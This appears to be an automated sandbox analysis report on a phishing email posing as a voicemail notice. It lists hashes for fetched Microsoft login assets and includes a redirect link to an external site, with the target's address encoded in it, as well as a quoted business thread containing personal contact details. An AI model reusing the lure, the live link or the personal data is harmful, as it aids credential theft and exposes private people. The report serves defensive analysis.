                                                                Malicious:false
                                                                Reputation:unknown
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                Category:downloaded
                                                                Size (bytes):17174
                                                                Entropy (8bit):2.9129715116732746
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://www.microsoft.com/favicon.ico?v2
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, ASCII text, with very long lines (955), with CRLF line terminators
                                                                Category:downloaded
                                                                Size (bytes):201253
                                                                Entropy (8bit):2.661810841903416
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:85DE642E1467807F64F7E10807DF3869
                                                                SHA1:C795B490811C0E5A1A8F3C3F620AAB9F00C34F07
                                                                SHA-256:5965B2C5472AACA1CD66EA5B0D07A971B961FEE72FC27EB1F6C760042084B21B
                                                                SHA-512:BF4EC56D6FC54EAAFBD57C4E4D06900D358E39CE15009FB983491B0A83ABB60A0A54F46BE86387AB837B4AE1D1F3FF99156D04207065B0F65F165B54CFAAF47B
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://www.microsoft.com/en-us/microsoft-365/outlook/email-and-calendar-software-microsoft-outlook?deeplink=%2fowa%2f&sdf=0
                                                                Preview:..<!DOCTYPE html><html xmlns:mscom="http://schemas.microsoft.com/CMSvNext".. xmlns:md="http://schemas.microsoft.com/mscom-data" lang="en-us".. xmlns="http://www.w3.org/1999/xhtml"><head><link rel="shortcut icon".. href="//www.microsoft.com/favicon.ico?v2" /><link.. type="text/css" rel="stylesheet".. href="https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.css".. /><title>Your request has been blocked. This could be.. due to several reasons.</title><meta name="Title".. content="We are sorry, the page you requested cannot be.. found" /><meta name="CorrelationVector".. content="VbLZYbRlhU2hyedN.1" /><meta name="Description".. content="" /><meta name="MscomContentLocale".. content="en-us" /><meta name="
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):36
                                                                Entropy (8bit):4.503258334775644
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:06B313E93DD76909460FBFC0CD98CB6B
                                                                SHA1:C4F9B2BBD840A4328F85F54873C434336A193888
                                                                SHA-256:B4532478707B495D0BB1C21C314AEF959DD1A5E0F66E52DAD5FC332C8B697CBA
                                                                SHA-512:EFD7E8195D9C126883C71FED3EFEDE55916848B784F8434ED2677DF5004436F7EDE9F80277CB4675C4DEB8F243B2705A3806B412FAA8842E039E9DC467C11645
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwmCAmly1gHbXRIFDdFbUVISBQ1Xevf9?alt=proto
                                                                Preview:ChgKDQ3RW1FSGgQIVhgCIAEKBw1Xevf9GgA=
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 15755
                                                                Category:downloaded
                                                                Size (bytes):5529
                                                                Entropy (8bit):7.95514518328613
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:6DEB44A9FE273266EFABC3214B998BA0
                                                                SHA1:C8BE755694C25E416C81F5057670E3B14B2FE08F
                                                                SHA-256:4A1AA3B8B23FB3C150A62BB681DAE96E6CAB20BFAFB89D74FED2E0BC85826BAF
                                                                SHA-512:EBA11F91C3751574F82FBF82F81338761142ABC13B14534133A2986BEF2F2505125B648E1E991F79C1ACC731A9008F98C3F7937649533E7C4E59C2548D4E7452
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_d0a803279e7397bef834.js
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):15
                                                                Entropy (8bit):3.189898095464287
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:39A19D0882684989864FA50BCED6A2D1
                                                                SHA1:5CED55DAC2E0427E9DC605CEC1FEDAB0949EB15E
                                                                SHA-256:8FBEDED073249C3611742297EE96A976A95EE113F33B9A422A5D3A7A2DEB63E5
                                                                SHA-512:E795CB7DE27B42948B7DDFF19F3B401A8F95753AC7D37D9B5F52D8DACD2AA43A2AD9EACEC29F77D28080E20C21C48B9FA88A733FAC108939FB2F0EB036C7AEEE
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://statics-marketingsites-wcus-ms-com.akamaized.net/statics/override.css?c=7
                                                                Preview:/* empty css */
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                                Category:dropped
                                                                Size (bytes):621
                                                                Entropy (8bit):7.673946009263606
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:4761405717E938D7E7400BB15715DB1E
                                                                SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                                SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                                SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (32089)
                                                                Category:dropped
                                                                Size (bytes):92629
                                                                Entropy (8bit):5.303443527492463
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:397754BA49E9E0CF4E7C190DA78DDA05
                                                                SHA1:AE49E56999D82802727455F0BA83B63ACD90A22B
                                                                SHA-256:C12F6098E641AACA96C60215800F18F5671039AECF812217FAB3C0D152F6ADB4
                                                                SHA-512:8C64754F77507AB2C24A6FC818419B9DD3F0CECCC9065290E41AFDBEE0743F0DA2CB13B2FBB00AFA525C082F1E697CB3FFD76EF9B902CB81D7C41CA1C641DFFB
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:/*! jQuery v1.9.1 | (c) 2005, 2012 jQuery Foundation, Inc. | jquery.org/license.//@ sourceMappingURL=jquery.min.map.*/(function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,T=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,k=/^[\],:{}\s]*$/,E=/(?:^|:|,)(?:\s*\[)+/g,S=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,A=/"[^"\\\r\n]*"|true|false|null|-?(?:\d+\.|)\d+(?:[eE][+-]?\d+|)/g,j=/^-ms-/,D=/-([\da-z])/gi,L=function(e,t){return t.toUpperCase()},H=function(e){(o.addEventListener||"load"===e.type||"complete"===o.readyState)&&(q(),b.ready())},q=function(){o.addEventListener?(o.removeEventListener("DOMContentLoaded",H,!1),e.removeEventListener("load",H,!1)):(o.detachEvent("onreadystatechange",H),e.detachEvent("onload",H)
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113378
                                                                Category:downloaded
                                                                Size (bytes):20400
                                                                Entropy (8bit):7.980289584022803
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:F0DE9A98DBDFA8C02742CE6D92FB2524
                                                                SHA1:CDEC682AEB9E39EDCCC2374DAB26F04DB754A8B5
                                                                SHA-256:FAF4294F27A542B0F9EA2A7CB2711529AB027CD84A5F5BADFAE752100855E6BE
                                                                SHA-512:856FC9AB199997E69A9487372BC0083564F7115B3E0678CF1D542B9864E9A88D5FFB85697FD93538DC9439071E3BCD4B8BCCBFC610E1A45DE104D6362D8ADCD9
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_nin8k2ycrbzww8zl5vxkaq2.css
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (41651)
                                                                Category:downloaded
                                                                Size (bytes):131537
                                                                Entropy (8bit):5.2237799798561975
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:30B7C335C62E5269E2D35B8E8B9F44B4
                                                                SHA1:C6D92B1516EB8F6D44AAF171FB24A1B2AADD0C4C
                                                                SHA-256:10733A5D876108F81C5F78EEE5C9760A739D89C52FA6180C4290B7F909F24346
                                                                SHA-512:5BCE247C84C88F993A857CE2F1E8540C648672DEB6D92A55BC808C33394B784C52866D635BEC8B7CD5E62A7EA4109569AC8BCD1381571B84592ACD6C5901D7A8
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://www.microsoft.com/onerfstatics/marketingsites-wcus-prod/shell/_scrf/js/themes=default/54-af9f9f/c0-247156/de-099401/e1-a50eee/e7-954872/d8-97d509/f0-251fe2/46-be1318/77-04a268/11-240c7b/63-077520/a4-34de62/1b-c96630/db-bc0148/dc-7e9864/78-4c7d22/e1-c35781/40-7b7803/cd-23d3b0/6d-1e7ed0/b7-cadaa7/ca-40b7b0/4e-ee3a55/3e-f5c39b/c3-6454d7/f9-7592d3/92-10345d/79-499886/7e-cda2d3/db-f3b1fd/93-283c2d/e0-3c9860/91-97a04f/1f-100dea/33-abe4df/19-c0fae7?ver=2.0&iife=1
                                                                Preview:(function(){/**. * @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. */.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a["*"]||{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0||r===1&&n[2]===".."||n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u||y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):61
                                                                Entropy (8bit):3.990210155325004
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 79 x 78, 8-bit/color RGB, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):61
                                                                Entropy (8bit):3.9778349503715043
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:228B63099E198B831BF889D6ACF4D50E
                                                                SHA1:6930398EE84FBE62908E7E5F6F2A4DE121A1372B
                                                                SHA-256:EDEF72AC444C19F9387816DC0F6A5CF0D074E0B25639375306CA79B36BF32FC8
                                                                SHA-512:E2B497F4B2CCC9FE6AC67EDD32466C4EA31B80CA192B192B1744A0B2B4FE918E17C52F75BCE4F08395D49120A90BDDE471B239B40E07EE3430960AC25D1605B8
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8e31e7aafcda144b/1731701641045/-bGdmoW2_wt1SdQ
                                                                Preview:.PNG........IHDR...O...N........t....IDAT.....$.....IEND.B`.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:GIF image data, version 89a, 352 x 3
                                                                Category:downloaded
                                                                Size (bytes):2672
                                                                Entropy (8bit):6.640973516071413
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:166DE53471265253AB3A456DEFE6DA23
                                                                SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:very short file (no magic)
                                                                Category:dropped
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:1
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):563851
                                                                Entropy (8bit):5.221453271093944
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:12DD1E4D0485A80184B36D158018DE81
                                                                SHA1:EB2594062E90E3DCD5127679F9C369D3BF39D61C
                                                                SHA-256:A04B5B8B345E79987621008E6CC9BEF2B684663F9A820A0C7460E727A2A4DDC3
                                                                SHA-512:F3A92BF0C681E6D2198970F43B966ABDF8CCBFF3F9BD5136A1CA911747369C49F8C36C69A7E98E0F2AED3163D9D1C5D44EFCE67A178DE479196845721219E12C
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.css
                                                                Preview:@charset "UTF-8";/*! @ms-mwf/mwf - v1.25.0+6321934 | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css *
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:Web Open Font Format, TrueType, length 26288, version 0.0
                                                                Category:downloaded
                                                                Size (bytes):26288
                                                                Entropy (8bit):7.984195877171481
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:D0263DC03BE4C393A90BDA733C57D6DB
                                                                SHA1:8A032B6DEAB53A33234C735133B48518F8643B92
                                                                SHA-256:22B4DF5C33045B645CAFA45B04685F4752E471A2E933BFF5BF14324D87DEEE12
                                                                SHA-512:9511BEF269AE0797ADDF4CD6F2FEC4AD0C4A4E06B3E5BF6138C7678A203022AC4818C7D446D154594504C947DA3061030E82472D2708149C0709B1A070FDD0E3
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://www.microsoft.com/mwf/_h/v3.54/mwf.app/fonts/mwfmdl2-v3.54.woff
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                Category:dropped
                                                                Size (bytes):673
                                                                Entropy (8bit):7.6596900876595075
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:0E176276362B94279A4492511BFCBD98
                                                                SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:GIF image data, version 89a, 352 x 3
                                                                Category:downloaded
                                                                Size (bytes):3620
                                                                Entropy (8bit):6.867828878374734
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, ASCII text
                                                                Category:downloaded
                                                                Size (bytes):315
                                                                Entropy (8bit):5.0572271090563765
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                                SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                                SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                                SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:http://condominioanacarolina.com.br/favicon.ico
                                                                Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:Unicode text, UTF-8 text, with very long lines (64241)
                                                                Category:downloaded
                                                                Size (bytes):167730
                                                                Entropy (8bit):5.045981547409661
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:AFB5C64B13342F6E568093548D0A2A9F
                                                                SHA1:95FC121CCCFDBA12443CF87A9C823486065A14AB
                                                                SHA-256:238DB52476BF8107E2E851CD3299B071ED5944B570C1603A1EA758A4FADF5F29
                                                                SHA-512:6FE8BADD1B94E81464C0808383A4CC77F779BF226A3C13B58B2BCB36332995EFBC7711373EE8AB2A8BC52675884F9885D168CB2DE9535E39E71B0B72940691E1
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://www.microsoft.com/onerfstatics/marketingsites-wcus-prod/west-european/shell/_scrf/css/themes=default.device=uplevel_web_pc/2b-7ae144/7e-3283eb/69-8122fc/86-016699/72-2b1d8c/80-6461e7/2a-d9be59/51-40faf7?ver=2.0
                                                                Preview:@charset "UTF-8";./*! | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.body{margin:0}.context-uh
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 33 x 76, 8-bit/color RGB, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):61
                                                                Entropy (8bit):4.014960565232003
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:FE245F849186FA0ED4DB94617B46FE0A
                                                                SHA1:58A615ABE638C7AD79C49DD114A7261D9920C13B
                                                                SHA-256:B1931DBA22C99A20E6A147F712E61B3BB0E9C2A1C4AF661E65BA5098934FB146
                                                                SHA-512:C0F584A1A60C3C47D9D75CAB27808D96F5E8EDC261A79302F7127D01940F49D42D144D1117FF24ABB80C6F5A87FA7BD90A67284060C4B1F98FCF70B09ED708ED
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:.PNG........IHDR...!...L.....l.I.....IDAT.....$.....IEND.B`.
                                                                File type:ASCII text, with very long lines (676), with CRLF, LF line terminators
                                                                Entropy (8bit):6.197036035947996
                                                                TrID:
                                                                • Standard Unix Mailbox (42005/1) 100.00%
                                                                File name:ee0b6b037b16b54632b6b37d1fb72727.eml
                                                                File size:205'664 bytes
                                                                MD5:4b9e5facdef9a6a766716ef1a494d15c
                                                                SHA1:c7df5078fe1808cc06078c8d2629835732e97dc9
                                                                SHA256:4d156810843e3438e761c4f3cbfecaccd29c4b64b2ea6aa73e54aed5283cf120
                                                                SHA512:81797d3724bc07bb3f3574cd394b65ac23e5369b6b1ba30d87165f714c6f243d760ed33730c2c61d7e695e79df6bee38792babd31a7fa6baab10efce7187c150
                                                                SSDEEP:6144:bdksZIfYsEZkRwDKZwaGLiAKWtr/rySq2LUDS29666r:bdksZIfYsghiAdrTnb4u
                                                                TLSH:3F147D47EDD50E71CC9A20EC2C07776F3A7808EBD927AC70AAEE765F090ECD9914A115
                                                                File Content Preview:From nobody Fri Nov 15 20:07:29 2024.X-MS-Exchange-Organization-InternalOrgSender: False.ARC-Seal: i=2; a=rsa-sha256; s=arcselector10001; d=microsoft.com; cv=pass;. b=j2MTXz0IzWT6fasm+8qIFRZ7dBxhFmhrnMhSjj3RALCXLY48luWDS7/1CRl45ROjSbFj6m/ltNFYrIRC97oSYaeJ
                                                                Subject:[External] - MONTROSE-ENV: You have a Voice Mail (if)
                                                                From:"Audio.calls" <rbeuk@generous-minds.com>
                                                                To:kelly.swanson@montrose-env.com
                                                                Cc:
                                                                BCC:
                                                                Date:Fri, 15 Nov 2024 17:21:09 -0800
                                                                Communications:
                                                                • You don't often get email from rbeuk@generous-minds.com. Learn why this is important<https://aka.ms/LearnAboutSenderIdentification> <https://www.google.es/url?q=querywbir(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3D&sa=t&url=amp%2fcondominioanacarolina.com.br%2flockeq%2fwtolwzl224moscrjiovolvgdhya1s0oym4bi4/a2VsbHkuc3dhbnNvbkBtb250cm9zZS1lbnYuY29t> [cid:C91B23753AA0697700D1@WINCLJBGQJP] 54054 Yes Have not received estimate. Thanks Cyndi. Thank you, John M Herrmann SERVICE MANAGER Hill Idealease, LLC 740-633-3011(Office) 724-531-1195(Cell) 740-633-2140(Fax) ------------------
                                                                • From: Cyndi Matvya <cmatvya@shamrockutilitytrailer.com> Sent: Wednesday, May 3, 2023 11:13 AM To: John Herrmann <jherrmann@hillidealease.com> Cc: Richard Reuille <rreuille@hillidealease.com>; Lisa Zwiesler <lzwiesler@hillidealease.com> Subject: RE: IDEALEASE 322913 / 321806 Unit 321806 is in the shop. Unit #322913 Did you ever get a quote for this one, I seen it was started but looks like the parts were put on, I will have them get this done ASAP. Thank you ~ and make it a great day. Cyndi Matvya Service Administrator & Accounts Receivable Shamrock Utility Trailers, Inc 500 North Center Avenue, New Stanton, PA 15672<500%20North%20Center%20Avenue,%20New%20Stanton,%20PA%20%2015672> 724-925-9200 724-925-6999 FAX
                                                                • From: John Herrmann <jherrmann@hillidealease.com<mailto:jherrmann@hillidealease.com>> Sent: Wednesday, May 3, 2023 10:53 AM To: Cyndi Matvya <cmatvya@shamrockutilitytrailer.com<mailto:cmatvya@shamrockutilitytrailer.com>> Cc: Richard Reuille <rreuille@hillidealease.com<mailto:rreuille@hillidealease.com>>; Lisa Zwiesler <lzwiesler@hillidealease.com<mailto:lzwiesler@hillidealease.com>> Subject: IDEALEASE 322913 / 321806 Good morning Cyndi I wanted to check and see the status of the units 322913 and 321806 we have there for box repairs. Thank you, John M Herrmann SERVICE MANAGER Hill Idealease, LLC <span ________________________________ CONFIDENTIALITY NOTICE: The contents of this email message and any attachments are intended solely for the addressee(s) and may contain confidential, proprietary and/or privileged information and may be legally protected from disclosure. If you are not the intended recipient of this message or their agent, or if this message has been addressed to you in error, please immediately alert the sender by reply email and then delete this message and any attachments and the reply from your system. If you are not the intended recipient, you are hereby notified that any disclosure, use, dissemination, copying, or storage of this message or its attachments is strictly prohibited.
                                                                Attachments:
                                                                • ilil.pdf
                                                                Key Value
                                                                X-MS-Exchange-Organization-InternalOrgSender False
                                                                ARC-Seal i=1; a=rsa-sha256; s=arcselector10001; d=microsoft.com; cv=none; b=Aw0bxXWPzNzW59z/62NmJhlaMr3lbWtk4Q7QLROefbauqa8gvKTCExft349e+drI0AcES12h11zO7q4nm3PIrnCrkaMAW0ioiRS3y1kJJiYG5A2CXs3WiWadsgSIGCSHrOn7XYsBXqPbQOvo1U3fz0uoh2GheKADimGCUeTh6ni1qoS3VtyF1SfHotSpJ6WUGIS05VnnIGhQWjMpN0DJz4rkVfRDiE4FzX2Y7IRiwsnN3tqaWC3X9f4e0RzBTOBsaqtmUs4WZpFSF8vwtGjh4PPabUoF+CQiv21sO4+Ml77vYRyDi9KdJB/GuXPmohUD1Gk96pL9FTXHMOQPw3sg0A==
